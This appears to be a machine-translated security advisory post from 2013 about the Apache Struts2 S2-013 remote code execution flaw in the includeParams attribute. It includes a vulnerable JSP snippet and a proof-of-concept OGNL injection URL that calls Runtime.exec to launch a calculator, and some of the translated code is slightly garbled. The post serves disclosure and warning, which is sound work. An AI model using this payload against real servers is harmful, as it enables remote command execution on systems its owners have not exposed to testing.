Struts2 again broke arbitrary code execution vulnerability-vulnerability warning-the black bar safety net

2013-05-22T00:00:00
ID MYHACK58:62201338890
Type myhack58
Reporter 佚名
Modified 2013-05-22T00:00:00

Description

Summary

Apache official struts2 products, recently out of a remote code execution vulnerability, the number“S2-0 1 3”, and is currently a 0DAY, the no official repair programme appears.

http://struts.apache.org/development/2.x/docs/security-bulletins.html — (announcement)

The official security Bulletin shows the number and a brief description,“A vulnerability, present in the includeParams attribute of the URL and Anchor Tag, allows remote command execution”on.

But did not say the principle, there is no release of any patch.

s. jsp:

< %@ page language="java" import="java. util.*" pageEncoding="utf-8"%>< %@ taglib prefix="s" uri="/struts-tags"%><s:a includeParams="all">Click here.& lt;/s:a>

Test EXP:

http://admin-pc:8080/Struts2/s.jsp?a=1${%23_memberAccess[%22allowStaticMethodAccess%2 2]=true,@java.lang.Runtime@getRuntime(). exec('calc')}

0